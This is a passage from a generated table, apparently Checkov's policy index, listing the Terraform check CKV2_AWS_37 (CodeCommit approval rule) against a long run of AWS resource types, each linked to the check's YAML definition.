[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1297 | CKV2_AWS_37 | resource | aws_rds_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1298 | CKV2_AWS_37 | resource | aws_rds_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1299 | CKV2_AWS_37 | resource | aws_rds_global_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1300 | CKV2_AWS_37 | resource | aws_redshift_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1301 | CKV2_AWS_37 | resource | aws_redshift_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1302 | CKV2_AWS_37 | resource | aws_redshift_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1303 | CKV2_AWS_37 | resource | aws_redshift_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1304 | CKV2_AWS_37 | resource | aws_redshift_snapshot_copy_grant | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1305 | CKV2_AWS_37 | resource | aws_redshift_snapshot_schedule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1306 | CKV2_AWS_37 | resource | aws_redshift_snapshot_schedule_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1307 | CKV2_AWS_37 | resource | aws_redshift_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1308 | CKV2_AWS_37 | resource | aws_resourcegroups_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1309 | CKV2_AWS_37 | resource | aws_root | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1310 | CKV2_AWS_37 | resource | aws_root_access_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1311 | CKV2_AWS_37 | resource | aws_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1312 | CKV2_AWS_37 | resource | aws_route53_delegation_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1313 | CKV2_AWS_37 | resource | aws_route53_health_check | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1314 | CKV2_AWS_37 | resource | aws_route53_query_log | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1315 | CKV2_AWS_37 | resource | aws_route53_record | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1316 | CKV2_AWS_37 | resource | aws_route53_resolver_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1317 | CKV2_AWS_37 | resource | aws_route53_resolver_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1318 | CKV2_AWS_37 | resource | aws_route53_resolver_rule_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1319 | CKV2_AWS_37 | resource | aws_route53_vpc_association_authorization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1320 | CKV2_AWS_37 | resource | aws_route53_zone | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1321 | CKV2_AWS_37 | resource | aws_route53_zone_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1322 | CKV2_AWS_37 | resource | aws_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1323 | CKV2_AWS_37 | resource | aws_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1324 | CKV2_AWS_37 | resource | aws_s3_access_point | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1325 | CKV2_AWS_37 | resource | aws_s3_account_public_access_block | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1326 | CKV2_AWS_37 | resource | aws_s3_bucket | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1327 | CKV2_AWS_37 | resource | aws_s3_bucket_analytics_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1328 | CKV2_AWS_37 | resource | aws_s3_bucket_inventory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1329 | CKV2_AWS_37 | resource | aws_s3_bucket_metric | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1330 | CKV2_AWS_37 | resource | aws_s3_bucket_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1331 | CKV2_AWS_37 | resource | aws_s3_bucket_object | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1332 | CKV2_AWS_37 | resource | aws_s3_bucket_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1333 | CKV2_AWS_37 | resource | aws_s3_bucket_public_access_block | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1334 | CKV2_AWS_37 | resource | aws_sagemaker_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1335 | CKV2_AWS_37 | resource | aws_sagemaker_endpoint_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1336 | CKV2_AWS_37 | resource | aws_sagemaker_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1337 | CKV2_AWS_37 | resource | aws_sagemaker_notebook_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1338 | CKV2_AWS_37 | resource | aws_sagemaker_notebook_instance_lifecycle_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1339 | CKV2_AWS_37 | resource | aws_secretsmanager_secret | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1340 | CKV2_AWS_37 | resource | aws_secretsmanager_secret_rotation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1341 | CKV2_AWS_37 | resource | aws_secretsmanager_secret_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1342 | CKV2_AWS_37 | resource | aws_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1343 | CKV2_AWS_37 | resource | aws_security_group_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1344 | CKV2_AWS_37 | resource | aws_securityhub_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1345 | CKV2_AWS_37 | resource | aws_securityhub_member | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1346 | CKV2_AWS_37 | resource | aws_securityhub_product_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1347 | CKV2_AWS_37 | resource | aws_securityhub_standards_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1348 | CKV2_AWS_37 | resource | aws_service_discovery_http_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1349 | CKV2_AWS_37 | resource | aws_service_discovery_private_dns_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1350 | CKV2_AWS_37 | resource | aws_service_discovery_public_dns_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1351 | CKV2_AWS_37 | resource | aws_service_discovery_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1352 | CKV2_AWS_37 | resource | aws_servicecatalog_portfolio | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1353 | CKV2_AWS_37 | resource | aws_servicequotas_service_quota | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1354 | CKV2_AWS_37 | resource | aws_ses_active_receipt_rule_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1355 | CKV2_AWS_37 | resource | aws_ses_configuration_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1356 | CKV2_AWS_37 | resource | aws_ses_domain_dkim | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1357 | CKV2_AWS_37 | resource | aws_ses_domain_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1358 | CKV2_AWS_37 | resource | aws_ses_domain_identity_verification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1359 | CKV2_AWS_37 | resource | aws_ses_domain_mail_from | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1360 | CKV2_AWS_37 | resource | aws_ses_email_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1361 | CKV2_AWS_37 | resource | aws_ses_event_destination | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1362 | CKV2_AWS_37 | resource | aws_ses_identity_notification_topic | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1363 | CKV2_AWS_37 | resource | aws_ses_identity_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1364 | CKV2_AWS_37 | resource | aws_ses_receipt_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1365 | CKV2_AWS_37 | resource | aws_ses_receipt_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1366 | CKV2_AWS_37 | resource | aws_ses_receipt_rule_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1367 | CKV2_AWS_37 | resource | aws_ses_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1368 | CKV2_AWS_37 | resource | aws_sfn_activity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1369 | CKV2_AWS_37 | resource | aws_sfn_state_machine | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1370 | CKV2_AWS_37 | resource | aws_shield_protection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1371 | CKV2_AWS_37 | resource | aws_simpledb_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1372 | CKV2_AWS_37 | resource | aws_snapshot_create_volume_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1373 | CKV2_AWS_37 | resource | aws_sns_platform_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1374 | CKV2_AWS_37 | resource | aws_sns_sms_preferences | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1375 | CKV2_AWS_37 | resource | aws_sns_topic | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1376 | CKV2_AWS_37 | resource | aws_sns_topic_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1377 | CKV2_AWS_37 | resource | aws_sns_topic_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1378 | CKV2_AWS_37 | resource | aws_spot_datafeed_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1379 | CKV2_AWS_37 | resource | aws_spot_fleet_request | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1380 | CKV2_AWS_37 | resource | aws_spot_instance_request | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1381 | CKV2_AWS_37 | resource | aws_sqs_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1382 | CKV2_AWS_37 | resource | aws_sqs_queue_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1383 | CKV2_AWS_37 | resource | aws_ssm_activation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1384 | CKV2_AWS_37 | resource | aws_ssm_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1385 | CKV2_AWS_37 | resource | aws_ssm_document | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1386 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1387 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1388 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1389 | CKV2_AWS_37 | resource | aws_ssm_parameter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1390 | CKV2_AWS_37 | resource | aws_ssm_patch_baseline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1391 | CKV2_AWS_37 | resource | aws_ssm_patch_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1392 | CKV2_AWS_37 | resource | aws_ssm_resource_data_sync | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1393 | CKV2_AWS_37 | resource | aws_storagegateway_cache | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1394 | CKV2_AWS_37 | resource | aws_storagegateway_cached_iscsi_volume | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1395 | CKV2_AWS_37 | resource | aws_storagegateway_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1396 | CKV2_AWS_37 | resource | aws_storagegateway_nfs_file_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1397 | CKV2_AWS_37 | resource | aws_storagegateway_smb_file_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1398 | CKV2_AWS_37 | resource | aws_storagegateway_upload_buffer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1399 | CKV2_AWS_37 | resource | aws_storagegateway_working_storage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1400 | CKV2_AWS_37 | resource | aws_subnet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1401 | CKV2_AWS_37 | resource | aws_swf_domain | Ensure CodeCommit associates an approval rule | Terraform | 